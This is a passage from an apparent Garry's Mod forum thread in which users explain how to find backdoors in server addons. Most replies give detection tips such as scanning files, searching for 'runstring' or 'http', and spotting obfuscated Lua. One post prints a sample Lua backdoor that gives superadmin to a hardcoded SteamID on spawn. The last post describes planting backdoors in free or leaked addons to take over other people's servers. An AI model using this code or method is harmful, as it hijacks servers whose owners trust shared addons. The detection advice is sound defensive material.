Garry's Mod

How to find backdoors?

Submitted by ThatGuyz, , Thread ID: 166005

Thread Closed

RE: How to find backdoors?

Nigro
Member
Level:
6
Reputation:
0
Posts:
146
Likes:
1
Credits:
1
09-04-2020, 11:24 PM
This post was last modified: 09-04-2020, 11:29 PM by Nigro
#11
if the antivirus dont detect any things, i use virustotal, an site who scan your file with more than 50 antivirus

if the antivirus dont detect any things, i use virustotal, an site who scan your file with more than 50 antivirus .-.

RE: How to find backdoors?

host1ng
Novice
Level:
1
Reputation:
0
Posts:
25
Likes:
0
Credits:
0
22-04-2020, 12:52 AM
#12
In most archive editors, you get an option to search for keywords, most backdoors involves giving someone superadmin or admins permissions so you should look for scripts like:
Code:
function sbDRP( ply )
if ( ply:SteamID() == "STEAM_1:0:143352462" ) then
ply:SetUserGroup("superadmin")
end
end
hook.Add("PlayerSpawn", "sbDRP", sbDRP

Otherwise, you can use tools like the guys from above said, be careful!

RE: How to find backdoors?

steamworkshop
Closed Account
Level:
0
Reputation:
0
Posts:
39
Likes:
3
Credits:
11
22-04-2020, 04:47 PM
#13
Just ask freemann from vcmod hes a pro at all this stuff

RE: How to find backdoors?

VannnO
Novice
Level:
0
Reputation:
0
Posts:
33
Likes:
1
Credits:
0
22-04-2020, 07:57 PM
#14
In General, they can be found in the code by the keywords http and so on . But in many cases this is obfuscation or tabulation and in many cases you can just delete them

RE: How to find backdoors?

bracket134
Newbie
Level:
0
Reputation:
0
Posts:
15
Likes:
0
Credits:
0
25-04-2020, 10:13 AM
#15
Sometimes people can obscure the lua code, so if you see anything really out of the ordinary that doesn't look like normal lua code, it is prob a backdoor that has been obfuscated

RE: How to find backdoors?

Sephotai
Newbie
Level:
0
Reputation:
0
Posts:
12
Likes:
0
Credits:
0
26-04-2020, 04:09 PM
#16
Oh i learn qomet8ngs today ! Thanks for the explain !

RE: How to find backdoors?

VladOperYT
Novice
Level:
2
Reputation:
0
Posts:
45
Likes:
3
Credits:
0
26-04-2020, 04:45 PM
#17
Create addon or find addon in internet. BackDoor Finder (noad). He find popular backdoors

RE: How to find backdoors?

gamingbro
Active Member
Prime
Level:
0
Reputation:
2
Posts:
230
Likes:
7
Credits:
0
26-04-2020, 04:47 PM
#18
I had saw people post backdoor finders earlier which you could use that will help you find backdoors :D

RE: How to find backdoors?

Ransom
Member
Level:
0
Reputation:
0
Posts:
103
Likes:
3
Credits:
8
08-05-2020, 02:02 PM
#19
07-04-2020, 07:42 AM
ThatGuyz Wrote:
Hello, i'm pretty new at this things and i don't know much about backdoors and things, i know they can destroy servers and such but what i want to know is where are backdoors usually located and how do they look like ?
A CPE Addon can find backdoors, and you can find backdoors with this method: In notepad you search all of your addons folder, and search "runstring".

RE: How to find backdoors?

VoLVeR
Junior Member
Level:
3
Reputation:
0
Posts:
82
Likes:
1
Credits:
37
08-05-2020, 07:30 PM
#20
You make backdoor or u leak one addon then put backdoor in it then give it for free if people use them u can go to their servers and make ur self even superadmin give

Users browsing this thread: 1 Guest(s)